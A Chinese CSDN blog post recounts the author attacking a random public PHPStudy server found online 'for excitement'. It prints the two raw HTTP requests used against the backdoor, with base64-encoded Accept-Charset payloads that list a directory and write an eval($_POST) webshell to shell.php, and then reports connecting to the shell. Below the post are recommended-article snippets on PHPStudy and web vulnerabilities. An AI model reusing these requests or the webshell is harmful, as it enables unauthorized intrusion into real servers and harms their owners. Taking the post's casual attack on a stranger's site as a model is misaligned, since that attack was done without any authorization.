php漏洞挖掘与修复,记一次PHPstudy漏洞挖掘过程

最新推荐文章于 2024-07-16 06:42:42 发布
最新推荐文章于 2024-07-16 06:42:42 发布
阅读量168 收藏
点赞数
文章标签: php漏洞挖掘与修复

今天有点烦躁,所以得找点事刺激一下

于是,公网上搜了一个PHPstudy的站

568.html

测试payload看看有没有漏洞,果然、存在漏洞

568.html

看一下目录

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: close

568.html

写入webshell

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close

568.html

再次查看一下目录,可以看到成功了

568.html

连接,OK,收工。。。

568.html

爱吃火锅的上官燕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6705
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
PHP漏洞挖掘
10-21
20条途径挖掘PHP漏洞,请各位看看。大概有用吧
phpstudy漏洞
qq_17054659的博客
01-11 6199
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
PHPStudy漏洞:我们该如何看待?
最新发布
ab524100的博客
07-16 321
在互联网的世界里,PHPStudy作为一款集PHP环境、开发工具、教程于一体的集成开发环境(IDE),受到了许多初学者的喜爱。由此可见,随着其使用的广泛,一些安全问题也逐渐浮出水面,那就是我们常说的“PHPStudy漏洞”。说到PHPStudy漏洞,可能很多人会有些紧张,毕竟它涉及到我们的网站安全和数据安全。这并不是说PHPStudy本身不好,而是说我们在使用它的时候,需要保持警惕,了解可能存在的风险。二是定期更新和修补。我们应该多了解一些关于PHPStudy漏洞的知识,了解可能存在的风险和危害。
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3592
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1428
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
PHPStudy漏洞利用笔
边城浪子的博客
09-30 809
后门名称:Phpstudy后门 威胁等级:严重 影响范围:Phpstudy 2016、phpstudy2018 后门类型:C&C、命令执行 利用难度:极易 影响范围 目前已知受影响的phpstudy版本: · Phpstudy 2016版php-5.4 · Phpstudy 2018版php-5.2.17 · Phpstudy 2018版php-5.4.45 看了...
一次phpstudy后门漏洞复现
Animation77的博客
10-30 1607
通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\php...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1250
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
Web中间件常见安全漏洞
KHOST的博客
03-10 8407
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载地址,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
PHP代码审计基础:文件上传漏洞
1匹黑马
11-28 467
文章目录漏洞原理危害漏洞条件文件上传的可控点挖掘思路相关函数move_uploaded_file 漏洞原理 文件上传漏洞一些web应用程序中允许上传图片,文本或者其他资源到指定的位置。 文件上传漏洞就是利用网页代码中的文件上传路径变量过滤不严将可执行的文件上传到一个到服务器中,再通过URL去访问以执行恶意代码。 危害 上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传的文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行
【漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5442
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1516
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1358
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
PHP漏洞挖掘(二):PHP常见漏洞分析——课程
W小哥
06-01 273
放在csdn我的资源与XXX球: 链接:https://download.csdn.net/download/weixin_40412037/18413642 目录: 1-1 课程介绍 1-2 漏洞测试环境搭建 2-1 --密码漏洞分析讲解 2-10 PHP上传漏洞讲解 2-2 XSS漏洞讲解之持久型 2-3 XSS漏洞讲解之非持久型 2-4 SQL注入漏洞之联合注入 2-5 SQL注入漏洞之布尔注入 2-6 SQL注入漏洞之延时注入 2-7 SQL注入漏洞之报错注入 2-8 SQL注入漏洞之insert注
PHP代码审计和漏洞挖掘的一点思考
weixin_33726313的博客
09-19 218
PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂,今天我想主要谈谈关于PHP代码审计和漏洞挖掘的一些思路和理解。 PHP的漏洞发掘,其实就是web的渗透测试,和客户端的fuzzing测试一样,web的渗透测试也可以使用类似的技术,web fuzzing,即基于web的动态扫描。 这类软件国内外有很多,如WVS,Lan Guard,S...
PHPStudy RCE漏洞详解:远程代码执行风险与防范
"PHPStudy RCE漏洞是针对PHP开发环境工具PHPStudy的一种远程代码执行的安全威胁,允许攻击者通过特定的配置错误或漏洞在不受限制的情况下执行任意代码,从而控制服务器。这种漏洞常见于文件上传功能的不当实现、弱...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值